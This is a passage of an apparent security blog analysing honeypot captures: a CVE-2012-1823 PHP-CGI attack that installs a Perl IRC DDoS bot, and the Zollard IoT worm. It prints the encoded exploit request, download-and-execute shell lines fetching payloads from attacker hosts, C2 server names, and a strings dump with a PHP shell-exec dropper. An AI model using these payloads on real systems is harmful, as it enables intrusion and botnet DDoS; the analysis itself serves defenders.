<span style="font-family: Courier New, Courier, monospace;">POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;">Content-Length: 188</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;">Content-Type: application/x-www-form-urlencoded</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;">Host: -h</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;"><br />
</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;">When decoded, the actual URL is :</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;"><br />
</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 14px; line-height: 1.428571em; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXqHdmZxMYN8yL6-sFQRJdJJKiVs9IdEEEHJunn7s_TYAbso7Vvqj8cA0sAYsYaxoWzsyZ-_qnhynTywcGoHtYqKkxyW1lKpklFL9qfH_KbXHN6vRwvMkfAHoszCa4uVvdsgnmLxQ4rL8/s1600/CVE-2012-1823.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXqHdmZxMYN8yL6-sFQRJdJJKiVs9IdEEEHJunn7s_TYAbso7Vvqj8cA0sAYsYaxoWzsyZ-_qnhynTywcGoHtYqKkxyW1lKpklFL9qfH_KbXHN6vRwvMkfAHoszCa4uVvdsgnmLxQ4rL8/s1600/CVE-2012-1823.jpg" height="86" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decoded CVE-2012-1823 exploit attempt</td></tr>
</tbody></table>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;"><br />
</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;">Upon successful compromise, the attacker injects the following:</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;"><br />
</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="color: orange; font-family: Courier New, Courier, monospace;"><? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?></span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;"><br />
</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 19.9999942779541px;">seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed"</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 19.9999942779541px;"><br />
</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; font-family: 'Courier New', Courier, monospace; font-size: 14px; line-height: 19.9999942779541px; margin: 0px; padding: 0px;">
<span style="color: orange;">#!/bin/bash</span></div>
<div style="border: 0px; font-family: 'Courier New', Courier, monospace; font-size: 14px; line-height: 19.9999942779541px; margin: 0px; padding: 0px;">
<span style="color: orange;">cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun</span></div>
<div style="border: 0px; font-family: 'Courier New', Courier, monospace; font-size: 14px; line-height: 19.9999942779541px; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
This script instructs the compromised server to fetch 'index.htm' from http://<span style="line-height: 1.428571em;"><redacted></span>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2". This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team". <span style="line-height: 1.428571em;">A copy of this popular IRCBot can be found at this </span><a href="http://pastebin.com/CJpxW5tx" style="line-height: 1.428571em;" target="_blank">PasteBin link</a><span style="line-height: 1.428571em;">.</span></div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;">Some of the configuration variables for the version of IrcBot dropped on our honeypots include:</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">$server = 'antiq.scifi.ro'</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">$server = 'antiq.evils.in'</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">my @admins = ("AnTiQ","deathy","Vasy");</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">my @channels = ("#vnc");</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;"><br />
</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;">The "seed' script also instructed our server to download "stats.php". This was also a tar file, which when expanded, created a hidden directory named ".d" which contained the following files:</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;"><br />
</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrXsTQkSBr3TTa6kek2M_whmHb2mLcZb_tni1RaRNOELOoStCAKfqv5cJVgXE1OPBbJjCEgdhvGQR_aZOPoF9CrTzbYcJhZxBvVjZp6q1NUl-mv_vhyYs8nHzDYuh-UmWYsO_lvafkfQ/s1600/d.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrXsTQkSBr3TTa6kek2M_whmHb2mLcZb_tni1RaRNOELOoStCAKfqv5cJVgXE1OPBbJjCEgdhvGQR_aZOPoF9CrTzbYcJhZxBvVjZp6q1NUl-mv_vhyYs8nHzDYuh-UmWYsO_lvafkfQ/s1600/d.jpg" height="246" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit;">Contents of hidden 'd' subdirectory</span></td></tr>
</tbody></table>
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 19.9999942779541px;">The subdirectory "c" contained source files for port flooding routines.</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;"><br />
</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZtthxBtVG-aqMjre59k9b35fmTokQ1txiC08IezAUxwco_M5M2KPwk2xWT02EINfGksILX8BxHPK0gc0-t-dmkMT46C8Kf0OixBLeOZk7wRAhYMgKLtn7iE8hZnDyBvjNz7JnVn-xaLU/s1600/c.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZtthxBtVG-aqMjre59k9b35fmTokQ1txiC08IezAUxwco_M5M2KPwk2xWT02EINfGksILX8BxHPK0gc0-t-dmkMT46C8Kf0OixBLeOZk7wRAhYMgKLtn7iE8hZnDyBvjNz7JnVn-xaLU/s1600/c.jpg" height="104" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit;">Contents of 'c' subdirectory</span></td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIeaKR-cYRnX2OiU9c7tP8Y9uGOb2Utqcjn1NFSDBddmwQG3zjzHS9pLhZBe77z2ndKgBRO1ptyYsDxtRkdI5lgnvEyQ05mZ1QIV3FOH-2c8gvB1vQKzt6MBVLaKukj_lZU3ECwA3PoYM/s1600/flood_src.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIeaKR-cYRnX2OiU9c7tP8Y9uGOb2Utqcjn1NFSDBddmwQG3zjzHS9pLhZBe77z2ndKgBRO1ptyYsDxtRkdI5lgnvEyQ05mZ1QIV3FOH-2c8gvB1vQKzt6MBVLaKukj_lZU3ECwA3PoYM/s1600/flood_src.jpg" height="400" width="333" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Section of "Slashing SirVic's"flooding source code.</td></tr>
</tbody></table>
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;">Two other files included in the "stats.php" tarball were of particular interest. They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports. At this point, it's not clear what these lists represent, however "bang.txt" appears to contain many non-U.S addresses, notably weighted toward Romania. "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;">After observing several DDoS attacks initiated by this infrastructure, we didn't note a correlation between these lists, and any attack victims. We also did not yet observe any correlation between these lists and compromised hosts initiating DDoS attack traffic.</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;">The contents of "bang.txt", broken out by ASN and Network name can </span>be viewed from here: <a href="https://files.sempersecurus.org/dumps/bang_by_asn.txt" target="_blank">Link to "bang.txt"</a></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here: </span><span style="font-family: inherit;"> </span><a href="https://files.sempersecurus.org/dumps/shiet_by_asn.txt" style="font-family: inherit;" target="_blank">Link to "shiet.txt"</a></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;">Soon after the script downloads, our server joined the IRC on antiq.scifi.ro (195.182.159.51)</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbcqwX-bhkcc5kbbaip7Q4Ejp4LOfE3oDIfHv6uEabvYzGOJbsiPezGecChgtV3VtAWFUdSOgiz1IxxYrIe-pbRjwCLWpUzwuPO2iiFhS4lHPsGAlzM74fFuSFNZYdAF_lD3X-NTiE2dY/s1600/irc_join.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbcqwX-bhkcc5kbbaip7Q4Ejp4LOfE3oDIfHv6uEabvYzGOJbsiPezGecChgtV3VtAWFUdSOgiz1IxxYrIe-pbRjwCLWpUzwuPO2iiFhS4lHPsGAlzM74fFuSFNZYdAF_lD3X-NTiE2dY/s1600/irc_join.jpg" height="394" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bot joining C2 on <span style="font-size: small; text-align: left;">antiq.scifi.ro</span></td></tr>
</tbody></table>
<div style="border: 0px; margin: 0px; padding: 0px;">
Not long after that, a command initiating a flood attack against 70.39.96.225 begins, and the compromised host begins sending fragmented UDP packets to the victim.</div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWwFGPUgPCb25Qyw3OSTwX9Pmb4JYx6EuKhFYnD1MNDuSsziyY6JAv9CDQfxdd5ZRV39YpGrlc9hUf6dVNKifGiqqcJSBm6BcXdc-Ii7m35YN7ODpgIDzKleQtS6k78FQ6y1Fdr8K55w/s1600/ddos_pid.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWwFGPUgPCb25Qyw3OSTwX9Pmb4JYx6EuKhFYnD1MNDuSsziyY6JAv9CDQfxdd5ZRV39YpGrlc9hUf6dVNKifGiqqcJSBm6BcXdc-Ii7m35YN7ODpgIDzKleQtS6k78FQ6y1Fdr8K55w/s1600/ddos_pid.jpg" height="76" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bot being instructed to begin UDP flood to victim</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNw1-7iDrL5W5I5WpIdAxIsuhMNCmNxXiMOX_d7IKR0gC1r-rXnO0WTL3kkcgim84MaU1Yk2Ge6P-yz0I9gKEBHmpKtacLlfkp2QtXbFqccdLXhsxPGOyjkQApJOme_uMnJtg9SC-nfkE/s1600/ddos_udp.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNw1-7iDrL5W5I5WpIdAxIsuhMNCmNxXiMOX_d7IKR0gC1r-rXnO0WTL3kkcgim84MaU1Yk2Ge6P-yz0I9gKEBHmpKtacLlfkp2QtXbFqccdLXhsxPGOyjkQApJOme_uMnJtg9SC-nfkE/s1600/ddos_udp.jpg" height="482" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Packet capture of UDP flood</td></tr>
</tbody></table>
We've observed this botnet as being very active, targeting a wide variety of victims. While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.<br />
<br />
Unpatched CMS, weak SSH passwords, as well as vulnerable PHP deployments remain a major weakspot in Internet facing servers. It's pretty safe to say that if web site administrators do not perform a regular, stringent patch management program, it's just a matter of 'when', not 'if' they will be compromised.<br />
<br />
<br />
<div style="border: 0px; margin: 0px; padding: 0px;">
<br /></div>
</div>
</div>
</div>
</div>
</div>
Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-62791679287207116912013-12-03T17:18:00.000-05:002013-12-03T23:27:08.601-05:00Hey Zollard, leave my Internet of Things alone!<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts. So <a href="http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices" target="_blank">Symantec's recent report</a> about Linux.Darlloz targeting "The Internet of Things" was of particular interest.<br />
<br />
Recently I noted an inbound PHP exploit attempt from <b><span style="color: yellow;">78.39.232.113</span> - Telecommunication Company of Kordestan - Iran</b><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2M6CkksMkJ9fWCmxFrmfSuq13YixeIauP1Wbe7lrBVinNyK0xDPzeYXTApCg4_N6DSMZlBiETbubhMZemFmidB50H1OHW66zQ9GKKxSChru5hebfrXP_b1C0NALUyy4lLUOV8rmpsKFA/s1600/exploit.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2M6CkksMkJ9fWCmxFrmfSuq13YixeIauP1Wbe7lrBVinNyK0xDPzeYXTApCg4_N6DSMZlBiETbubhMZemFmidB50H1OHW66zQ9GKKxSChru5hebfrXP_b1C0NALUyy4lLUOV8rmpsKFA/s400/exploit.png" width="292" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PHP exploit attempt from 78.39.232.113</td></tr>
</tbody></table>
The decoded POST is:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n</span><br />
<br />
Note the <b>User-Agent: Zollard</b> and the reference to the files that will attempt to be to be executed upon successful compromise. The files indicate several architectures, arm, ppc, mips, mipsel, and x86.<br />
<br />
All files were fetched, and the x86 file was sandboxed on a linux VM. Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455. The linux malware also opened up a listener on my VM's port 58455.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUxUXmYjx9GvNFt5Hnmx1j7aFWNPvN70y8v1mZ0062uMbz6kmP2D_u6ZQAzyRMrrsTIpo9JDmXdBURxiP6IrwK_XIXbUpuhm3P0_qBefHYD67JWupkAMuy5b54J-ZK43YWe1yO7av_DFs/s1600/netstat.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUxUXmYjx9GvNFt5Hnmx1j7aFWNPvN70y8v1mZ0062uMbz6kmP2D_u6ZQAzyRMrrsTIpo9JDmXdBURxiP6IrwK_XIXbUpuhm3P0_qBefHYD67JWupkAMuy5b54J-ZK43YWe1yO7av_DFs/s640/netstat.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Compromised host listening on port 58455</td></tr>
</tbody></table>
<br />
Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006<br />
<br />
Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445. Examining strings of the malware files show several usernames that are attempted, including "root" and "admin"<br />
Weak or non-existent passwords allow for a successful telnet login, with examples below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_xlxF5hdz2ZTCKB7OyXaPQyeJallgbx7Uv_aPB5nSriWRqK_-1FoprfbDvECI3XjQsiJCCweEMR2leIwrnCmL7uWElAx60BT9S0fgd3FT5qAjkIpqKsiVULgCnJAipCOco79orw9uF8/s1600/telnet_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_xlxF5hdz2ZTCKB7OyXaPQyeJallgbx7Uv_aPB5nSriWRqK_-1FoprfbDvECI3XjQsiJCCweEMR2leIwrnCmL7uWElAx60BT9S0fgd3FT5qAjkIpqKsiVULgCnJAipCOco79orw9uF8/s400/telnet_2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of Telnet session to a BusyBox device</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-DVVGL88QKGz_iYL4RUKxulL2YZdq_X9NV1ZVfbVC-kYzKwMcFXK1o7ocG8UFlLF7rTQjHJntCzyAVoB32T2_Qzf7HEVtq6_RfBXbRNttRKawhHt1AqW9d2MQ1QcbE9LBdc1wg4geaDE/s1600/telnet_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-DVVGL88QKGz_iYL4RUKxulL2YZdq_X9NV1ZVfbVC-kYzKwMcFXK1o7ocG8UFlLF7rTQjHJntCzyAVoB32T2_Qzf7HEVtq6_RfBXbRNttRKawhHt1AqW9d2MQ1QcbE9LBdc1wg4geaDE/s400/telnet_1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of Telnet session to ARM architecture device</td></tr>
</tbody></table>
<br />
As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched. You may find it of interest to see a strings dump of each of the files:<br />
<br />
<div style="text-align: left;">
<br /></div>
<table border="1" style="text-align: left;"><tbody>
<tr> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 400px;">
#EgvT2<br />
@ #!<br />
!1C "<br />
V! 0<br />
/proc/self/exe<br />
nodes<br />
POST <br />
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
/bin/sh<br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/var/0.run<br />
/var/1.run<br />
/var/idhash<br />
/var/response<br />
/var/challenge<br />
/var/b.arm_v5t<br />
/var/b.arm_v6k<br />
/var/f.arm_v5t<br />
/var/f-t2.arm_v6k<br />
/var/f-t2.mips<br />
/var/f-t2.mipsel<br />
/var/sp.arm_v5t<br />
/var/sp.arm_v6k<br />
/var/t2.arm_v6k<br />
/var/readme<br />
/var/b/b3.arm_v5t<br />
/var/b/b3.arm_v6k<br />
/var/b/b3.mips<br />
/var/b/b3.ramips<br />
/var/b/b3.rtl<br />
/var/b/readme<br />
/var/b/0.run<br />
/var/b/1.run<br />
/var/b/idhash<br />
/dav/0.run<br />
/dav/1.run<br />
/dav/b3.arm_v5t<br />
/dav/b3.arm_v6k<br />
/dav/b3.mips<br />
/dav/b3.rtl<br />
/dav/idhash<br />
/dav/readme<br />
/var/b<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/var/run/z<br />
reboot<br />
#!/bin/sh<br />
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot<br />
killall arm ppc mips mipsel<br />
sleep 10<br />
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot<br />
GET / HTTP/1.1<br />
Host: <br />
mipsel<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m > <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
admin<br />
root<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
